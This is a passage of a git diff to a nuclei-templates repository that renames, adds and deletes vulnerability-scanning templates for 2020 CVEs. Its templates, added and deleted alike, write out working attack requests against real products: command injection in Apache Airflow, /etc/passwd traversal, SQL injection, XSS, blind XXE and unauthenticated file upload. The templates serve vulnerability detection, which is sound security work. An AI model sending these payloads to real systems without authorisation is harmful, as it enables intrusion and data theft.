100% rename from nuclei-templates/CVE-2020/cve-2020-8194.yaml rename to nuclei-templates/CVE-2020/CVE-2020-8194.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-8654.yaml b/nuclei-templates/CVE-2020/CVE-2020-8654.yaml new file mode 100644 index 0000000000..83629c7d1c --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-8654.yaml @@ -0,0 +1,41 @@ +id: CVE-2020-8654 +info: + name: EyesOfNetwork 5.3 - Authenticated RCE + author: praetorian-thendrickson + severity: high + description: EyesOfNetwork version 5.1-5.3 is vulnerable to multiple exploits. Version 5.3 is vulnerable to CVE-2020-8654 (authenticated rce), CVE-2020-8655 (privesc), CVE-2020-8656 (SQLi - API version before 2.4.2), and 2020-8657 (hardcoded api key). Versions 5.1-5.3 are vulnerable to CVE-2020-9465 (SQLi). + reference: + - https://github.com/h4knet/eonrce + - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/eyesofnetwork_autodiscovery_rce.rb + - https://nvd.nist.gov/vuln/detail/CVE-2020-8657 + - https://github.com/EyesOfNetworkCommunity/eonweb/issues/50 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2020-8654 + cwe-id: CWE-78 + tags: cve,cve2020,cisa,eyesofnetwork,rce,authenticated +requests: + - method: GET + path: + - "{{BaseURL}}/css/eonweb.css" + extractors: + - type: regex + name: version + internal: true + part: body + group: 1 + regex: + - '# VERSION : ([0-9.]+)' + matchers-condition: and + matchers: + - type: dsl + dsl: + - compare_versions(version, '< 5.4', '>= 5.1') + - type: word + part: body + words: + - "EyesOfNetwork" + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2020/cve-2020-9402.yaml b/nuclei-templates/CVE-2020/CVE-2020-9402.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-9402.yaml rename to nuclei-templates/CVE-2020/CVE-2020-9402.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-10124.yaml b/nuclei-templates/CVE-2020/cve-2020-10124.yaml new file mode 100644 index 0000000000..a8142579c3 --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-10124.yaml @@ -0,0 +1,32 @@ +id: CVE-2020-10124 + +info: + name: SolarWindsOrion LFI + author: medbsq + severity: medium +#- https://www.cvebase.com/cve/2019/11043 + +requests: + - method: GET + path: + - "{{BaseURL}}/web.config.i18n.ashx?l=j&v=j" + - "{{BaseURL}}/SWNetPerfMon.db.i18n.ashx?l=j&v=j" + headers: + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + matchers-condition: and + matchers: + - type: word + words: + - "SolarWinds.Orion.Core.Common." + - "Connection String" + condition: or + part: body + - type: word + words: + - "text/plain" + - "SolarWindsOrionDatabaseUser" + condition: or + part: header + - type: status + status: + - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-11530.yaml b/nuclei-templates/CVE-2020/cve-2020-11530.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-11530.yaml rename to nuclei-templates/CVE-2020/cve-2020-11530.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-11930.yaml b/nuclei-templates/CVE-2020/cve-2020-11930.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-11930.yaml rename to nuclei-templates/CVE-2020/cve-2020-11930.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-11978.yaml b/nuclei-templates/CVE-2020/cve-2020-11978.yaml new file mode 100644 index 0000000000..6233422e44 --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-11978.yaml @@ -0,0 +1,60 @@ +id: CVE-2020-11978 +info: + name: Apache Airflow <= 1.10.10 - 'Example Dag' Remote Code Execution + author: pdteam + severity: high + description: An issue was found in Apache Airflow versions 1.10.10 and below. A remote code/command injection vulnerability was discovered in one of the example DAGs shipped with Airflow which would allow any authenticated user to run arbitrary commands as the user running airflow worker/scheduler (depending on the executor in use). If you already have examples disabled by setting load_examples=False in the config then you are not vulnerable. + reference: + - https://github.com/pberba/CVE-2020-11978 + - https://nvd.nist.gov/vuln/detail/CVE-2020-11978 + - https://twitter.com/wugeej/status/1400336603604668418 + + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2020-11978 + cwe-id: CWE-77 + +requests: + - raw: + - | + GET /api/experimental/test HTTP/1.1 + Host: {{Hostname}} + Accept: */* + + - | + GET /api/experimental/dags/example_trigger_target_dag/paused/false HTTP/1.1 + Host: {{Hostname}} + Accept: */* + + - | + POST /api/experimental/dags/example_trigger_target_dag/dag_runs HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: application/json + + {"conf": {"message": "\"; touch test #"}} + + - | + GET /api/experimental/dags/example_trigger_target_dag/dag_runs/{{exec_date}}/tasks/bash_task HTTP/1.1 + Host: {{Hostname}} + Accept: */* + + + extractors: + - type: regex + name: exec_date + part: body + group: 1 + internal: true + regex: + - '"execution_date":"([0-9-A-Z:+]+)"' + + req-condition: true + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'contains(body_4, "operator":"BashOperator")' + - 'contains(all_headers_4, "application/json")' + condition: and \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-11991.yaml b/nuclei-templates/CVE-2020/cve-2020-11991.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-11991.yaml rename to nuclei-templates/CVE-2020/cve-2020-11991.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-12271.yaml b/nuclei-templates/CVE-2020/cve-2020-12271.yaml new file mode 100644 index 0000000000..f32824b493 --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-12271.yaml @@ -0,0 +1,18 @@ +id: CVE-2020-12271 + +info: + name: Sophos XG Firewall Pre-Auth SQL Injection + author: medbsq + severity: critical +#https://www.cvebase.com/cve/2020/12271 +requests: + - method: GET + path: + - "{{BaseURL}}/userportal/webpages/myaccount/login.jsp" + headers: + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + matchers: + - type: word + words: + - "loginstylesheet" + part: body diff --git a/nuclei-templates/CVE-2020/cve-2020-12447.yaml b/nuclei-templates/CVE-2020/cve-2020-12447.yaml new file mode 100644 index 0000000000..bf3bf2f717 --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-12447.yaml @@ -0,0 +1,35 @@ +id: CVE-2020-12447 + +info: + name: Onkyo TX-NR585 Web Interface - Directory Traversal + author: 0x_Akoko + severity: high + description: Onkyo TX-NR585 1000-0000-000-0008-0000 devices allows remote unauthenticated users on the network to read sensitive files via %2e%2e%2f directory traversal and local file inclusion. + reference: + - https://blog.spookysec.net/onkyo-lfi + - https://nvd.nist.gov/vuln/detail/CVE-2020-12447 + - https://blog.spookysec.net/onkyo-lfi/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2020-12447 + cwe-id: CWE-22 + tags: cve,cve2020,onkyo,lfi,traversal + +requests: + - method: GET + path: + - "{{BaseURL}}/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/05/04 diff --git a/nuclei-templates/CVE-2020/cve-2020-13121.yaml b/nuclei-templates/CVE-2020/cve-2020-13121.yaml deleted file mode 100644 index 85e6f703ba..0000000000 --- a/nuclei-templates/CVE-2020/cve-2020-13121.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2020-13121 - -info: - name: Submitty 20.04.01 - Open redirect - author: 0x_Akoko - severity: medium - description: Submitty through 20.04.01 has an open redirect via authentication/login?old= during an invalid login attempt. - reference: - - https://github.com/Submitty/Submitty/issues/5265 - - https://www.cvedetails.com/cve/CVE-2020-13121 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2020-13121 - cwe-id: CWE-601 - tags: cve,cve2020,redirect,submitty,oos - -requests: - - raw: - - | - POST /authentication/check_login?old=http%253A%252F%252Fexample.com%252Fhome HTTP/1.1 - Host: {{Hostname}} - Origin: {{RootURL}} - Content-Type: application/x-www-form-urlencoded - Referer: {{RootURL}}/authentication/login - - user_id={{username}}&password={{password}}&stay_logged_in=on&login=Login - - cookie-reuse: true - matchers: - - type: regex - part: header - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 diff --git a/nuclei-templates/CVE-2020/CVE-2020-13167.yaml b/nuclei-templates/CVE-2020/cve-2020-13167.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-13167.yaml rename to nuclei-templates/CVE-2020/cve-2020-13167.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-13405.yaml b/nuclei-templates/CVE-2020/cve-2020-13405.yaml new file mode 100644 index 0000000000..12407d9ae9 --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-13405.yaml @@ -0,0 +1,47 @@ +id: CVE-2020-13405 + +info: + name: MicroWeber - Unauthenticated User Database Disclosure + author: ritikchaddha,amit-jd + severity: high + description: | + The PHP code for controller.php run Laravel's dump and die function on the users database. Dump and die simply prints the contents of the entire PHP variable (in this case, the users database) out to HTML. + reference: + - https://rhinosecuritylabs.com/research/microweber-database-disclosure/ + - https://nvd.nist.gov/vuln/detail/CVE-2020-13405 + - https://github.com/microweber/microweber/commit/269320e0e0e06a1785e1a1556da769a34280b7e6 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2020-13405 + cwe-id: CWE-306 + metadata: + shodan-query: http.html:"microweber" + verified: "true" + tags: cve,cve2020,microweber,unauth,disclosure + +requests: + - raw: + - | + POST /module/ HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + Referer: {{BaseURL}}admin/view:modules/load_module:users + + module={{endpoint}} + + payloads: + endpoint: + - "users/controller" + - "modules/users/controller" + - "/modules/users/controller" + + matchers: + - type: dsl + dsl: + - 'contains(body,"username")' + - 'contains(body,"password")' + - 'contains(body,"password_reset_hash")' + - 'status_code==200' + - 'contains(all_headers,"text/html")' + condition: and diff --git a/nuclei-templates/CVE-2020/CVE-2020-13483.yaml b/nuclei-templates/CVE-2020/cve-2020-13483.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-13483.yaml rename to nuclei-templates/CVE-2020/cve-2020-13483.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-14092.yaml b/nuclei-templates/CVE-2020/cve-2020-14092.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-14092.yaml rename to nuclei-templates/CVE-2020/cve-2020-14092.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-14408.yaml b/nuclei-templates/CVE-2020/cve-2020-14408.yaml deleted file mode 100644 index 8f848663db..0000000000 --- a/nuclei-templates/CVE-2020/cve-2020-14408.yaml +++ /dev/null @@ -1,42 +0,0 @@ -id: CVE-2020-14408 - -info: - name: Agentejo Cockpit 0.10.2 - Cross-Site Scripting - author: edoardottt - severity: medium - description: Agentejo Cockpit 0.10.2 contains a reflected cross-site scripting vulnerability due to insufficient sanitization of the to parameter in the /auth/login route, which allows for injection of arbitrary JavaScript code into a web page's content. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2020-14408 - cwe-id: CWE-79 - reference: - - https://github.com/agentejo/cockpit/issues/1310 - - https://nvd.nist.gov/vuln/detail/CVE-2020-14408 - metadata: - verified: true - tags: cve,cve2020,cockpit,agentejo,xss,oss - -requests: - - method: GET - path: - - "{{BaseURL}}/auth/login?to=/92874%27;alert(document.domain)//280" - - matchers-condition: and - matchers: - - - type: word - part: body - words: - - "redirectTo = '/92874';alert(document.domain)//280';" - - - type: word - part: header - words: - - "text/html" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/09/02 diff --git a/nuclei-templates/CVE-2020/CVE-2020-14750.yaml b/nuclei-templates/CVE-2020/cve-2020-14750.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-14750.yaml rename to nuclei-templates/CVE-2020/cve-2020-14750.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-14882.yaml b/nuclei-templates/CVE-2020/cve-2020-14882.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-14882.yaml rename to nuclei-templates/CVE-2020/cve-2020-14882.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-15004.yaml b/nuclei-templates/CVE-2020/cve-2020-15004.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-15004.yaml rename to nuclei-templates/CVE-2020/cve-2020-15004.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-15148.yaml b/nuclei-templates/CVE-2020/cve-2020-15148.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-15148.yaml rename to nuclei-templates/CVE-2020/cve-2020-15148.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-19282.yaml b/nuclei-templates/CVE-2020/cve-2020-19282.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-19282.yaml rename to nuclei-templates/CVE-2020/cve-2020-19282.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-2096.yaml b/nuclei-templates/CVE-2020/cve-2020-2096.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-2096.yaml rename to nuclei-templates/CVE-2020/cve-2020-2096.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-22211.yaml b/nuclei-templates/CVE-2020/cve-2020-22211.yaml deleted file mode 100644 index a303d4b08f..0000000000 --- a/nuclei-templates/CVE-2020/cve-2020-22211.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: CVE-2020-22211 - -info: - name: 74cms - ajax_street.php 'key' SQL Injection - author: ritikchaddha - severity: critical - description: | - SQL Injection in 74cms 3.2.0 via the key parameter to plus/ajax_street.php. - reference: - - https://github.com/blindkey/cve_like/issues/13 - - https://nvd.nist.gov/vuln/detail/CVE-2020-22211 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2020-22210 - cwe-id: CWE-89 - metadata: - fofa-query: app="74cms" - shodan-query: http.html:"74cms" - tags: cve,cve2020,74cms,sqli - -variables: - num: "999999999" - -requests: - - method: GET - path: - - '{{BaseURL}}/plus/ajax_street.php?act=key&key=%E9%8C%A6%27%20union%20select%201,2,3,4,5,6,7,md5({{num}}),9%23' - - matchers: - - type: word - part: body - words: - - '{{md5({{num}})}}' - -# Enhanced by cs on 2022/06/21 diff --git a/nuclei-templates/CVE-2020/CVE-2020-24223.yaml b/nuclei-templates/CVE-2020/cve-2020-24223.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-24223.yaml rename to nuclei-templates/CVE-2020/cve-2020-24223.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-24312.yaml b/nuclei-templates/CVE-2020/cve-2020-24312.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-24312.yaml rename to nuclei-templates/CVE-2020/cve-2020-24312.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-24391.yaml b/nuclei-templates/CVE-2020/cve-2020-24391.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-24391.yaml rename to nuclei-templates/CVE-2020/cve-2020-24391.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-24550.yaml b/nuclei-templates/CVE-2020/cve-2020-24550.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-24550.yaml rename to nuclei-templates/CVE-2020/cve-2020-24550.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-24589.yaml b/nuclei-templates/CVE-2020/cve-2020-24589.yaml deleted file mode 100644 index 85c9c535b0..0000000000 --- a/nuclei-templates/CVE-2020/cve-2020-24589.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: CVE-2020-24589 - -info: - name: WSO2 API Manager <=3.1.0 - Blind XML External Entity Injection - author: lethargynavigator - severity: critical - description: WSO2 API Manager 3.1.0 and earlier is vulnerable to blind XML external entity injection (XXE). XXE often allows an attacker to view files on the server file system, and to interact with any backend - or external systems that the application itself can access which allows the attacker to transmit sensitive data from the compromised server to a system that the attacker controls. - reference: - - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2020-0742 - - https://nvd.nist.gov/vuln/detail/CVE-2020-24589 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H - cvss-score: 9.1 - cve-id: CVE-2020-24589 - tags: cve,cve2020,wso2,xxe,oast,blind - -requests: - - raw: - - | - POST /carbon/generic/save_artifact_ajaxprocessor.jsp HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - payload=<%3fxml+version%3d"1.0"+%3f>%25xxe%3b]> - - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol - words: - - "http" - - - type: word - part: body - words: - - "Failed to install the generic artifact type" - -# Enhanced by mp on 2022/04/14 diff --git a/nuclei-templates/CVE-2020/CVE-2020-24609.yaml b/nuclei-templates/CVE-2020/cve-2020-24609.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-24609.yaml rename to nuclei-templates/CVE-2020/cve-2020-24609.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-24949.yaml b/nuclei-templates/CVE-2020/cve-2020-24949.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-24949.yaml rename to nuclei-templates/CVE-2020/cve-2020-24949.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-25078.yaml b/nuclei-templates/CVE-2020/cve-2020-25078.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-25078.yaml rename to nuclei-templates/CVE-2020/cve-2020-25078.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-25864.yaml b/nuclei-templates/CVE-2020/cve-2020-25864.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-25864.yaml rename to nuclei-templates/CVE-2020/cve-2020-25864.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-27735.yaml b/nuclei-templates/CVE-2020/cve-2020-27735.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-27735.yaml rename to nuclei-templates/CVE-2020/cve-2020-27735.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-27986.yaml b/nuclei-templates/CVE-2020/cve-2020-27986.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-27986.yaml rename to nuclei-templates/CVE-2020/cve-2020-27986.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-28188.yaml b/nuclei-templates/CVE-2020/cve-2020-28188.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-28188.yaml rename to nuclei-templates/CVE-2020/cve-2020-28188.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-28208.yaml b/nuclei-templates/CVE-2020/cve-2020-28208.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-28208.yaml rename to nuclei-templates/CVE-2020/cve-2020-28208.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-28351.yaml b/nuclei-templates/CVE-2020/cve-2020-28351.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-28351.yaml rename to nuclei-templates/CVE-2020/cve-2020-28351.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-28871.yaml b/nuclei-templates/CVE-2020/cve-2020-28871.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-28871.yaml rename to nuclei-templates/CVE-2020/cve-2020-28871.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-29453.yaml b/nuclei-templates/CVE-2020/cve-2020-29453.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-29453.yaml rename to nuclei-templates/CVE-2020/cve-2020-29453.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-29597.yaml b/nuclei-templates/CVE-2020/cve-2020-29597.yaml deleted file mode 100644 index 250129bae7..0000000000 --- a/nuclei-templates/CVE-2020/cve-2020-29597.yaml +++ /dev/null @@ -1,54 +0,0 @@ -id: CVE-2020-29597 - -info: - name: IncomCMS 2.0 - Arbitrary File Upload - author: princechaddha - severity: critical - description: | - IncomCMS 2.0 has a an insecure file upload vulnerability in modules/uploader/showcase/script.php. This allows unauthenticated attackers to upload files into the server. - reference: - - https://github.com/Trhackno/CVE-2020-29597 - - https://nvd.nist.gov/vuln/detail/CVE-2020-29597 - - https://github.com/M4DM0e/m4dm0e.github.io/blob/gh-pages/_posts/2020-12-07-incom-insecure-up.md - - https://m4dm0e.github.io/2020/12/07/incom-insecure-up.html - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2020-29597 - cwe-id: CWE-434 - metadata: - verified: "true" - tags: cve,cve2020,incomcms,fileupload,intrusive - -requests: - - raw: - - | - POST /incom/modules/uploader/showcase/script.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBEJZt0IK73M2mAbt - - ------WebKitFormBoundaryBEJZt0IK73M2mAbt - Content-Disposition: form-data; name="Filedata"; filename="{{randstr_1}}.png" - Content-Type: text/html - - {{randstr_2}} - ------WebKitFormBoundaryBEJZt0IK73M2mAbt-- - - - | - GET /upload/userfiles/image/{{randstr_1}}.png HTTP/1.1 - Host: {{Hostname}} - - req-condition: true - matchers-condition: and - matchers: - - type: word - part: body_1 - words: - - '{"status":"1","name":"{{randstr_1}}.png"}' - - - type: word - part: body_2 - words: - - '{{randstr_2}}' - -# Enhanced by CS 06/06/2022 diff --git a/nuclei-templates/CVE-2020/cve-2020-35234.yaml b/nuclei-templates/CVE-2020/cve-2020-35234.yaml new file mode 100644 index 0000000000..62acb0ba37 --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-35234.yaml @@ -0,0 +1,34 @@ +id: CVE-2020-35234 + +info: + name: SMTP WP Plugin Directory Listing + author: PR3R00T + severity: high + description: The WordPress Easy WP SMTP Plugin has its log folder remotely accessible and its content available for access. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2020-35234 + - https://blog.nintechnet.com/wordpress-easy-wp-smtp-plugin-fixed-zero-day-vulnerability/ + - https://wordpress.org/plugins/easy-wp-smtp/#developers + remediation: Upgrade to version 1.4.3 or newer and consider disabling debug logs. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2020-35234 + cwe-id: CWE-532 + tags: cve,cve2020,wordpress,wp-plugin,smtp + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/easy-wp-smtp/" + - "{{BaseURL}}/wp-content/plugins/wp-mail-smtp-pro/" + + matchers: + - type: word + words: + - "debug" + - "log" + - "Index of" + condition: and + +# Enhanced by cs on 2022/02/28 diff --git a/nuclei-templates/CVE-2020/CVE-2020-35476.yaml b/nuclei-templates/CVE-2020/cve-2020-35476.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-35476.yaml rename to nuclei-templates/CVE-2020/cve-2020-35476.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-35729.yaml b/nuclei-templates/CVE-2020/cve-2020-35729.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-35729.yaml rename to nuclei-templates/CVE-2020/cve-2020-35729.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-35736.yaml b/nuclei-templates/CVE-2020/cve-2020-35736.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-35736.yaml rename to nuclei-templates/CVE-2020/cve-2020-35736.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-3580.yaml b/nuclei-templates/CVE-2020/cve-2020-3580.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-3580.yaml rename to nuclei-templates/CVE-2020/cve-2020-3580.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-35848.yaml b/nuclei-templates/CVE-2020/cve-2020-35848.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-35848.yaml rename to nuclei-templates/CVE-2020/cve-2020-35848.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-36112.yaml b/nuclei-templates/CVE-2020/cve-2020-36112.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-36112.yaml rename to nuclei-templates/CVE-2020/cve-2020-36112.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-36287.yaml b/nuclei-templates/CVE-2020/cve-2020-36287.yaml deleted file mode 100644 index 0c9333c65c..0000000000 --- a/nuclei-templates/CVE-2020/cve-2020-36287.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: CVE-2020-36287 - -info: - name: Jira Dashboard Gadgets / Information Disclosure - author: Jafar_Abo_Nada - severity: medium - description: The dashboard gadgets preference resource of the Atlassian gadgets plugin used in Jira Server and Jira Data Center before version 8.13.5, and from version 8.14.0 before version 8.15.1 allows remote anonymous attackers to obtain gadget related settings via a missing permissions check. - tags: cve,cve2020,jira,atlassian,disclosure - reference: | - - https://twitter.com/Jafar_Abo_Nada/status/1386058611084890116 - - https://nvd.nist.gov/vuln/detail/CVE-2020-36287 - - # On a vulnerable instance, iterate through gadget ID from 10000 to 19999 to get exposed information /rest/dashboards/1.0/10000/gadget/{{id}}/prefs - -requests: - - raw: - - | - GET /rest/dashboards/1.0/10000/gadget/10000/prefs HTTP/1.1 - Host: {{Hostname}} - Accept-Encoding: gzip, deflate - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - - - | - GET /rest/dashboards/1.0/10000/gadget/10001/prefs HTTP/1.1 - Host: {{Hostname}} - Accept-Encoding: gzip, deflate - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - - req-condition: true - matchers: - - type: dsl - dsl: - - "status_code_1 == 200" - - "contains(body_1, '')" - - "status_code_2 != 401" - condition: and \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-5405.yaml b/nuclei-templates/CVE-2020/cve-2020-5405.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-5405.yaml rename to nuclei-templates/CVE-2020/cve-2020-5405.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-5410.yaml b/nuclei-templates/CVE-2020/cve-2020-5410.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-5410.yaml rename to nuclei-templates/CVE-2020/cve-2020-5410.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-6287.yaml b/nuclei-templates/CVE-2020/cve-2020-6287.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-6287.yaml rename to nuclei-templates/CVE-2020/cve-2020-6287.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-7209.yaml b/nuclei-templates/CVE-2020/cve-2020-7209.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-7209.yaml rename to nuclei-templates/CVE-2020/cve-2020-7209.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-7246.yaml b/nuclei-templates/CVE-2020/cve-2020-7246.yaml new file mode 100644 index 0000000000..bafb26ecdf --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-7246.yaml @@ -0,0 +1,20 @@ +id: CVE-2020-7246 + +info: + name: qdPM Authenticated Remote Code Execution + author: medbsq + severity: high + +requests: + - method: GET + path: + - "{{BaseURL}}/qdPM/" + - "{{BaseURL}}/" + headers: + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + matchers: + - type: word + words: + - "qdPM 9." + part: body + # https://www.cvebase.com/cve/2020/7246 diff --git a/nuclei-templates/CVE-2020/CVE-2020-7247.yaml b/nuclei-templates/CVE-2020/cve-2020-7247.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-7247.yaml rename to nuclei-templates/CVE-2020/cve-2020-7247.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-7318.yaml b/nuclei-templates/CVE-2020/cve-2020-7318.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-7318.yaml rename to nuclei-templates/CVE-2020/cve-2020-7318.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-7796.yaml b/nuclei-templates/CVE-2020/cve-2020-7796.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-7796.yaml rename to nuclei-templates/CVE-2020/cve-2020-7796.yaml diff --git 